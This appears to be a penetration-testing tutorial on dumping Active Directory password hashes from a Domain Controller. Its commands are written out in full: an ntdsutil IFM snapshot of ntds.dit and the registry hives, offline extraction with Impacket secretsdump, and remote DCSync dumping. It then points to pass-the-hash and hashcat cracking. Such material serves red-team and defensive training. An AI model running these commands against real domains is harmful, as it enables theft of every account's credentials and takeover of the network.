New Technologies Directory Services (NTDS)


What is NTDS?

New Technologies Directory Services (NTDS) is the Active Directory database: it holds every object in the domain (users, computers, groups), their attributes, and the credential material for each account (NTLM hashes and Kerberos keys).

NTDS is located in the directory C:\Windows\NTDS. The database file is not encrypted as a whole; what is encrypted is the credential material inside it: each password hash is encrypted with the Password Encryption Key (PEK), and the PEK is stored in ntds.dit encrypted under the boot key (SYSKEY) kept in the SYSTEM registry hive. A copy of ntds.dit alone is therefore useless without the matching SYSTEM hive. Direct access to the ntds.dit file is also not possible on a live DC: the directory service (running inside LSASS) keeps it open with an exclusive lock, so a consistent copy has to be taken with a tool that snapshots the database, such as ntdsutil below.

ntds.dit

This file, whose name stands for New Technologies Directory Services Directory Information Tree, is the database for Active Directory Domain Services (AD DS). It stores directory data such as password hashes and account details for every user and computer object in the domain, and makes that data available to network users and administrators.

(1) Local dumping (with no credentials)

Note that the methods discussed in this section only work with administrator access on the Domain Controller (DC), because they read the ntds.dit file, which is only present on a DC. No domain credentials are needed beyond that local administrator access: the hashes are recovered offline from the database file and the registry hives listed below.

The following files are required to dump the contents of the NTDS file:

  • C:\Windows\NTDS\ntds.dit (the database itself)

  • C:\Windows\System32\config\SYSTEM (required: holds the boot key that decrypts the PEK and, with it, the hashes)

  • C:\Windows\System32\config\SECURITY (optional for the NTDS hashes themselves, but it adds LSA secrets and cached domain logons)

Run the following command on the DC to take an IFM (Install From Media) snapshot of the NTDS database, which writes a consistent copy of the locked file together with the registry hives (output in the c:\temp directory):

PowerShell session on DC (with administrator access)
PS> ntdsutil.exe 'activate instance ntds' 'ifm' 'create full c:\temp' quit quit

# short form (ntdsutil accepts any unambiguous abbreviation of its keywords)
PS> ntdsutil.exe 'ac i ntds' 'i' 'create full c:\temp' q q
  • ac i ntds: short for activate instance ntds, which selects the AD DS database instance

  • i: short for ifm, which enters the Install From Media menu

  • create full c:\temp: writes a full IFM set (ntds.dit plus the SYSTEM and SECURITY hives) into c:\temp

  • q q: short for quit quit, which leaves the ifm menu and then ntdsutil

We can now view the dumped files in the c:\temp directory, with the following structure:

  • Active Directory

    • ntds.dit

    • ntds.jfm

  • registry

    • SECURITY

    • SYSTEM

Next, we copy the three files listed above (ntds.dit and the two registry hive files SYSTEM and SECURITY) to our attacker machine and use Impacket's secretsdump.py to extract the hashes:

Attacker machine
$ impacket-secretsdump -security <path_to_SECURITY> -system <path_to_SYSTEM> -ntds <path_to_ntds.dit> LOCAL
  • -security: SECURITY hive to parse (optional; adds LSA secrets and cached domain credentials)

  • -system: SYSTEM hive to parse (required: its boot key decrypts the PEK and, with it, the hashes in ntds.dit)

  • -ntds: NTDS.DIT file to parse

  • LOCAL in the target position tells secretsdump to parse these offline files instead of connecting to a host; add -outputfile <prefix> to write the results to files as well

(2) Remote dumping (with credentials)

For the following attack (DCSync: the attacker asks the DC to replicate account secrets the way another DC would), we require credentials for a user holding the following permissions on the domain object (by default held by Domain Admins, Enterprise Admins, Administrators and the Domain Controllers group):

a. Replicating Directory Changes

b. Replicating Directory Changes All

c. Replicating Directory Changes in Filtered Set (listed for completeness; a and b are what the attack needs)

Attacker machine
$ impacket-secretsdump -just-dc <TARGET>
  • -just-dc: Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)

Attacker machine
$ impacket-secretsdump -just-dc-ntlm <TARGET>
  • -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only)

The value for the <TARGET> field is the authenticated user (with the permissions listed above) and the Domain Controller to query, in the form [[domain/]username[:password]@]<DC hostname or IP>, e.g. test.loc/jarrett@x.x.x.x. If the password is omitted, secretsdump prompts for it; to authenticate with an NT hash instead of a password, add -hashes LMHASH:NTHASH.

Now that we have obtained the hashes, we can either impersonate an account with its NT hash (pass-the-hash, for example via the -hashes option of the Impacket tools), or try to recover the plaintext by cracking the NT hash with hashcat (mode 1000, NTLM) or similar.
